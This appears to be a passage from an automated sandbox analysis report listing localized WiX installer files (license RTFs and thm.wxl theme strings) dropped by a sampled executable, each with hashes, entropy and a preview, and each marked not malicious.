Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installation de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Voulez-vous vraiment annuler.?</String>.. <String Id="HelpHeader">Aide du programme d'installation</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - installe, r.pare, d.sinstalle ou.. cr.e une copie locale compl.te du groupe dans le r.pertoire. Install est l'option par d.faut...../passive \| /quiet - affiche une interface minimale, sans invite, ou n'affiche ni interface.. ni invite. Par d.faut, l'interface et toutes les invites sont affich.es...../norestart - supprime toutes les tentatives de red.

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1040\license.rtf

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	137248
Entropy (8bit):	5.052211156922915
Encrypted:	false
SSDEEP:	768:xIAsG3raxuctlR0dLbAoQbQpdbK952zEwMh2i2Qt/rrlIKCV8FYWzJSVyewrolRg:xXlQq0ER9TlPJRJlGCw27rB/gTrXh9ow
MD5:	2695188EA76F05D28E416EF68A8360DC
SHA1:	B035E972FF9FDD0D354CDCC82BC999EAE2585D4A
SHA-256:	796678DCEBA427B3DB6C4366C64E33242F42746414E34619D03BB3AC7DF61773
SHA-512:	0A936D03EFD352012E0EEB6CDABEDA3C7F95E5FC5DBDB92E22FCBB9C0BAEB8518ABD77E5EE52BC75C65D2990C3A68F552AB4199932A0EF56566E803DC6976ACD
Malicious:	false
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff43\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 00000000000000000000}Times New Roman{\\falt Times};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New{\\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\\panose 05050102010706020507}Symbol{\\falt Bookshelf Symbol 3};}..{\f10\fbidi \fnil\fcharset2\fprq2{\\panose 05000000000000000000}Wingdings{\\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\\panose 02020609040205080304}MS Mincho{\\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\\panose 00000000000000000000}SimSun{\\falt ??\'a1\'a7??};}{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math{\\falt Calisto MT};}..{\f42\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0603020202020204}Trebuchet MS{\\falt Arial};}{\f43\fbidi \fswiss\fchars

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1040\thm.wxl

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3319
Entropy (8bit):	5.019774955491369
Encrypted:	false
SSDEEP:	48:c5DiTlO1eesy+hD9BOtBFv5Vo8BbQhMNDJN3msNlNohNNz+wcPclM+PAoYKp+K/u:uDiTlfQvo8WutJ/s9FHNOJp
MD5:	D90BC60FA15299925986A52861B8E5D5
SHA1:	FADFCA9AB91B1AB4BD7F76132F712357BD6DB760
SHA-256:	0C57F40CC2091554307AA8A7C35DD38E4596E9513E9EFAE00AC30498EF4E9BC2
SHA-512:	11764D0E9F286B5AA7B1A9601170833E462A93A1E569A032FCBA9879174305582BD42794D4131B83FBCFBF1CF868A8D5382B11A4BD21F0F7D9B2E87E3C708C3F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installazione di [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Annullare?</String>.. <String Id="HelpHeader">Guida alla configurazione</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - installa, ripara, disinstalla o.. crea una copia locale completa del bundle nella directory. L'opzione predefinita . Install...../passive \| /quiet - visualizza un'interfaccia utente minima senza prompt oppure non visualizza alcuna interfaccia utente.. n. prompt. Per impostazione predefinita viene visualizzata l'intera interfaccia utente e tutti i prompt...../norestart - annulla quals

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1041\license.rtf

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	192070
Entropy (8bit):	4.996677693401952
Encrypted:	false
SSDEEP:	1536:sSLYiGIMksR85oewkXoit1XzI/JdkMwfQVWWMBK9y:tdoewjzcKQ
MD5:	E4B1C1A962F936960A18EFF073CE0F85
SHA1:	7F3B430ED445D403CE7D6D73561BD31241C72743
SHA-256:	1640B64416C29A5369A800A431BCF10EBC2B68A6C9563C185BB25DAEA64B68B4
SHA-512:	77E4FAAAD82B0B1C1205D079A7F4134511D1E58C6C71149896912B9DA2C413B9E5456D129C418FE5DC759A3DDA4DC37E16E269587667CE16740528A31C7085F9
Malicious:	false
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff43\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 00000000000000000000}Times New Roman{\\falt Times};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New{\\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\\panose 05050102010706020507}Symbol{\\falt Bookshelf Symbol 3};}..{\f10\fbidi \fnil\fcharset2\fprq2{\\panose 05000000000000000000}Wingdings{\\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\\panose 02020609040205080304}MS Mincho{\\falt ?l?r ??\'81\'66c};}..{\f15\fbidi \fmodern\fcharset128\fprq1{\\panose 020b0609070205080204}MS Gothic{\\falt ?l?r ?S?V?b?N};}{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math{\\falt Calisto MT};}..{\f42\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0603020202020204}Trebuchet MS{\\falt Arial};}{\f43\fbidi \fswiss

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1041\thm.wxl

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3959
Entropy (8bit):	5.955167044943003
Encrypted:	false
SSDEEP:	96:uDiTlDuB1n+RNmvFo6bnpojeTPk0R/vueX5OA17IHdGWz:5uB1+gD1DU4EdGE
MD5:	DC81ED54FD28FC6DB6F139C8DA1BDED6
SHA1:	9C719C32844F78AAE523ADB8EE42A54D019C2B05
SHA-256:	6B9BBF90D75CFA7D943F036C01602945FE2FA786C6173E22ACB7AFE18375C7EA
SHA-512:	FD759C42C7740EE9B42EA910D66B0FA3F813600FD29D074BB592E5E12F5EC09DB6B529680E54F7943821CEFE84CE155A151B89A355D99C25A920BF8F254AA008
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.. <Control Control="UninstallButton" X="270" Y="237" Width="120" Height="23"/>.. <Control Control="RepairButton" X="187" Y="237" Width="80" Height="23"/>.. .. <String Id="Caption">[WixBundleName] .......</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">..........</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - ............ ......... .........................

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1042\license.rtf

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	336800
Entropy (8bit):	4.83259451523418
Encrypted:	false
SSDEEP:	1536:YUsoeY4RprxnsvNNqn3w5GX6u4fp9aCLM18DNJDGsOrhEcJ3w85rl4huyCKYkRi/:Tehp7X
MD5:	33C57BFA5A558EADC27335B5189E56FD
SHA1:	BFE88AC1BF05242F09235E0B18B89B839FE8C0E8
SHA-256:	B694C6AA350D339082744D46B7F22D5FA0E2B238A60BA50CCB25F0263CD6184C
SHA-512:	476EA2D70AC47663CBA440E4D2688F4C92B0306C7A6CDBC1F4D0EAC7188C1D0E99A21C4632E45CB6C94F99DB065240D323BD0A591EF7F09BB05F084467102B0E
Malicious:	false
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff43\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 00000000000000000000}Times New Roman{\\falt Times};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New{\\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\\panose 05050102010706020507}Symbol{\\falt Bookshelf Symbol 3};}..{\f10\fbidi \fnil\fcharset2\fprq2{\\panose 05000000000000000000}Wingdings{\\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\\panose 02020609040205080304}MS Mincho{\\falt MS Mincho};}..{\f13\fbidi \fnil\fcharset134\fprq2{\\panose 00000000000000000000}SimSun{\\falt ??\'a1\'a7??};}{\f15\fbidi \fmodern\fcharset128\fprq1{\\panose 020b0609070205080204}MS Gothic{\\falt ?l?r ?S?V?b?N};}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math{\\falt Calisto MT};}{\f42\fbidi \fswiss\fchar

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1042\thm.wxl

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3249
Entropy (8bit):	5.985100495461761
Encrypted:	false
SSDEEP:	48:c5DiTlO4TesKOwhDNJCkt1NhEN3m/NFNkbKNdExpVgUnqx6IPaRc0KoUK9TKz0KR:uDiTlUJJCsgqf6YVoz4uU5vI54U5TY
MD5:	B3399648C2F30930487F20B50378CEC1
SHA1:	CA7BDAB3BFEF89F6FA3C4AAF39A165D14069FC3D
SHA-256:	AD7608B87A7135F408ABF54A897A0F0920080F76013314B00D301D6264AE90B2
SHA-512:	C5B0ECF11F6DADF2E68BC3AA29CC8B24C0158DAE61FE488042D1105341773166C9EBABE43B2AF691AD4D4B458BF4A4BF9689C5722C536439CA3CDC84C0825965
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] .. ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">.. ...</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - ..... ... .. .. .... .., .., .. .... ...... ... .........../passive \| /quiet - .... .. .. UI. ..... UI ... ..... .... ..... ..... UI. .. ..... ........../norestart - .. .... .. .... ...

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1045\license.rtf

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	146702
Entropy (8bit):	5.0856537258555266
Encrypted:	false
SSDEEP:	1536:xLrakUMRd3Tvn2/YpMzhCvxAt0puz5RrSh9V1:p5LR11
MD5:	685C9868B96E1B1E3AAD6F445398DDB5
SHA1:	4FECE198C6529B4D85F6A7E2EB812F684D106A6C
SHA-256:	B02A4EF81AF44709937DD763ED06721054AFDEE3E916D8CD969D6F4203FEB8F9
SHA-512:	BEE27D202C99F8902C6221BC877D0FC4EFC1B5E6E4170278C317E2A2C2DD6EBBC1D877BEDB117112D0044074213A0745D0A81E09BBF3F842B66425533CFC393D
Malicious:	false
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff43\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 00000000000000000000}Times New Roman{\\falt Times};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New{\\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\\panose 05050102010706020507}Symbol{\\falt Bookshelf Symbol 3};}..{\f10\fbidi \fnil\fcharset2\fprq2{\\panose 05000000000000000000}Wingdings{\\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\\panose 02020609040205080304}MS Mincho{\\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\\panose 00000000000000000000}SimSun{\\falt ??\'a1\'a7??};}{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math{\\falt Calisto MT};}..{\f42\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0603020202020204}Trebuchet MS{\\falt Arial};}{\f43\fbidi \fswiss\fchars

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1045\thm.wxl

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3212
Entropy (8bit):	5.268378763359481
Encrypted:	false
SSDEEP:	48:c5DiTlOPesar4hDo7zGriQjDCN3mDNN0NrsNGl3vxkIP2hUdKLK0KbK4n6W0sfNM:uDiTlusPGriQw8n2rOij4JsU
MD5:	15172EAF5C2C2E2B008DE04A250A62A1
SHA1:	ED60F870C473EE87DF39D1584880D964796E6888
SHA-256:	440B309FCDF61FFC03B269FE3815C60CB52C6AE3FC6ACAD14EAC04D057B6D6EA
SHA-512:	48AA89CF4A0B64FF4DCB82E372A01DFF423C12111D35A4D27B6D8DD793FFDE130E0037AB5E4477818A0939F61F7DB25295E4271B8B03F209D8F498169B1F9BAE
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalator [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Czy na pewno chcesz anulowa.?</String>.. <String Id="HelpHeader">Instalator . Pomoc</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [katalog] - Instaluje, naprawia, odinstalowuje.. lub tworzy pe.n. lokaln. kopi. pakietu w katalogu. Domy.lnie jest u.ywany prze..cznik install...../passive \| /quiet - Wy.wietla ograniczony interfejs u.ytkownika bez monit.w albo nie wy.wietla ani interfejsu u.ytkownika,.. ani monit.w. Domy.lnie jest wy.wietlany interfejs u.ytkownika oraz wszystkie monity...../norestart - Pom

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1046\license.rtf

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	138913
Entropy (8bit):	5.044368938767221
Encrypted:	false
SSDEEP:	1536:xrp4Wo4RhHpPGqhGfJQ+vNYyVS3Qq7roh9xP:BTtbQ/
MD5:	43629C964FE1B8E5D9FF71F49C296832
SHA1:	19B4730B85D288F9F2EBEBBC365E1B5470FFD1A8
SHA-256:	402B8B57A0DD29AD8B0742807C62D8ADCB1265C753B8BCC26727CB06A7390620
SHA-512:	557A4D89BD39AFF449B02F908F8BBEAD18644CC53E4B2F66FD587D07574D94BBAE27783458F92B4AC7BD2BE687542A726546258DD608454464AAAF4D437F68A3
Malicious:	false
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff43\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 00000000000000000000}Times New Roman{\\falt Times};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New{\\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\\panose 05050102010706020507}Symbol{\\falt Bookshelf Symbol 3};}..{\f10\fbidi \fnil\fcharset2\fprq2{\\panose 05000000000000000000}Wingdings{\\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\\panose 02020609040205080304}MS Mincho{\\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\\panose 00000000000000000000}SimSun{\\falt ??\'a1\'a7??};}{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math{\\falt Calisto MT};}..{\f42\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0603020202020204}Trebuchet MS{\\falt Arial};}{\f43\fbidi \fswiss\fchars

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1046\thm.wxl

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3095
Entropy (8bit):	5.150868216959352
Encrypted:	false
SSDEEP:	48:c5DiTlO5es/4ThDzmU6lDj4N3mBl0N+NWNP4hHCc9skPDXeKKeK9KfKt4eJ2RQdg:uDiTlJhJGl2UsZMLe6
MD5:	BE27B98E086D2B8068B16DBF43E18D50
SHA1:	6FAF34A36C8D9DE55650D0466563852552927603
SHA-256:	F52B54A0E0D0E8F12CBA9823D88E9FD6822B669074DD1DC69DAD6553F7CB8913
SHA-512:	3B7C773EF72D40A8B123FDB8FC11C4F354A3B152CF6D247F02E494B0770C28483392C76F3C222E3719CF500FE98F535014192ACDDD2ED9EF971718EA3EC0A73E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Instala..o</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Tem certeza de que deseja cancelar?</String>.. <String Id="HelpHeader">Ajuda da Instala..o</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [diret.rio - instala, repara, desinstala ou.. cria uma c.pia local completa do pacote no diret.rio. Install . o padr.o..../passive \| /quiet - exibe a IU m.nima sem nenhum prompt ou n.o exibe nenhuma IU e.. nenhum prompt. Por padr.o, a IU e todos os prompts s.o exibidos...../norestart - suprime qualquer tentativa de reiniciar. Por padr.o, a IU perguntar. antes de reiniciar

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1049\license.rtf

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	177672
Entropy (8bit):	4.912081002639965
Encrypted:	false
SSDEEP:	1536:xT7acUURt3LVGW4FvUN6bAgKIJfgspZzrJh9pXG:pJ5OC
MD5:	02BB82A1B7FD10F4BC25F30DC7C51560
SHA1:	CD33810CA5AA36320E255B56C1E9AF64465F0319
SHA-256:	D050DCE48FB874C777E08A90F85E00A174752E2D060B9E0E3EBC800BBFB59708
SHA-512:	556A6710AF23008D96F9FDF40168F17536656EC27E6704FE51161272EE76AE3D7682A758D443D9C7120BB823809BD3DCFB13B2448A5095F918414913B6D8927A
Malicious:	false
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff43\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 00000000000000000000}Times New Roman{\\falt Times};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New{\\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\\panose 05050102010706020507}Symbol{\\falt Bookshelf Symbol 3};}..{\f10\fbidi \fnil\fcharset2\fprq2{\\panose 05000000000000000000}Wingdings{\\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\\panose 02020609040205080304}MS Mincho{\\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\\panose 00000000000000000000}SimSun{\\falt ??\'a1\'a7??};}{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math{\\falt Calisto MT};}..{\f42\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0603020202020204}Trebuchet MS{\\falt Arial};}{\f43\fbidi \fswiss\fchars

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1049\thm.wxl

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	4150
Entropy (8bit):	5.444436038992627
Encrypted:	false
SSDEEP:	48:c5DiTlDhQt9esbrohDTWJt49kAr7DHN3m5GNDCNvNLIkflhrWncPingGdZwK1Kqp:uDiTlDYVgmt4xJ88k193ipzjvL
MD5:	17C652452E5EE930A7F1E5E312C17324
SHA1:	59F3308B87143D8EA0EA319A1F1A1F5DA5759DD3
SHA-256:	7333BC8E52548821D82B53DBD7D7C4AA1703C85155480CB83CEFD78380C95661
SHA-512:	53FD207B96D6BCF0A442E2D90B92E26CBB3ECC6ED71B753A416730E8067E831E9EB32981A9E9368C4CCA16AFBCB2051483FDCFC474EA8F0D652FCA934634FBE8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.... <String Id="Caption">......... ......... [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">....... .. .........</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [.......] - ........., .............., ........ ..... ........ ...... ......... ..... ...... . ......... .. ......... - ............../passive \| /quiet - ........... ....

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1055\license.rtf

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	150879
Entropy (8bit):	5.039534637098723
Encrypted:	false
SSDEEP:	1536:x38Iq8sRFj95OGDTXP4cAJ8Dp29+Ezrth9p:JKL9tpPkr
MD5:	ADDDCD1020CE3F7F43795FB544409D3A
SHA1:	331185CE67E7A3782D97DBD0C269F54C4F32C863
SHA-256:	1C46C012A24BE7A41ACF3FB86211C32E54AB7CF2E4A935764FED251DD5C22E1F
SHA-512:	0D4D660170C1BA0127425858F48C163DFF12E46C838B317268BFDEAA32CD8BB4F98A7F0896C62B86EF8EF309F51D0060D458D175D8BC25DABBE7203E01A85E85
Malicious:	false
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff43\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 00000000000000000000}Times New Roman{\\falt Times};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New{\\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\\panose 05050102010706020507}Symbol{\\falt Bookshelf Symbol 3};}..{\f10\fbidi \fnil\fcharset2\fprq2{\\panose 05000000000000000000}Wingdings{\\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\\panose 02020609040205080304}MS Mincho{\\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\\panose 00000000000000000000}SimSun{\\falt ??\'a1\'a7??};}{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math{\\falt Calisto MT};}..{\f42\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0603020202020204}Trebuchet MS{\\falt Arial};}{\f43\fbidi \fswiss\fchars

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1055\thm.wxl

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3221
Entropy (8bit):	5.280530692056262
Encrypted:	false
SSDEEP:	48:c5DiTlOaesHEqhDTHV4zVy6oBzdp0DYK2GP2ZmN3majyNXNoNKQXVvChcPc+WKb0:uDiTl3PHcIflKNTPgdi12xgg
MD5:	DEFBEA001DC4EB66553630AC7CE47CCA
SHA1:	90CED64EC7C861F03484B5D5616FDBCDA8F64788
SHA-256:	E5ABE3CB3BF84207DAC4E6F5BBA1E693341D01AEA076DD2D91EAA21C6A6CB925
SHA-512:	B3B7A22D0CDADA21A977F1DCEAF2D73212A4CDDBD298532B1AC97575F36113D45E8D71C60A6D8F8CC2E9DBF18EE1000167CFBF0B2E7ED6F05462D77E0BCA0E90
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Kurulumu</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.ptal etmek istedi.inizden emin misiniz?</String>.. <String Id="HelpHeader">Kurulum Yard.m.</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [dizin] - y.kler, onar.r, kald.r.r ya da.. dizindeki paketin tam bir yerel kopyas.n. olu.turur. Varsay.lan install de.eridir...../passive \| /quiet - en az d.zeyde istemsiz UI g.sterir ya da hi. UI g.stermez ve.. istem yoktur. Varsay.lan olarak UI ve t.m istemler g.r.nt.lenir...../norestart - yeniden ba.lama denemelerini engeller. Varsay.lan olarak UI yeniden ba.l

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\2052\license.rtf

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	159106
Entropy (8bit):	5.016805901889515
Encrypted:	false
SSDEEP:	1536:B/L6iScgGuRqxoewkdKXN8lqdOVNMrZ3z/SNkrvokO7TavRoN9V:Z1oew6vqawVzaNkrvpOOoNj
MD5:	6011A93D1278215EBCD51161CEFE81E1
SHA1:	8407D923C71251BCF40BE6EA2BB62DC282782A17
SHA-256:	825C3D9F26969629B1BD287574ADF4B8E1A581F9E83B0B35C4B3BF5BC6998C71
SHA-512:	68B15E15199298AFC7AAE47199A13379E9A0947AE0682F84BD9713BCF1635CB11AFF7734C1F9A45CF87E36C75AE7B98032E7181F7CBE24B03C0E173FC68562E9
Malicious:	false
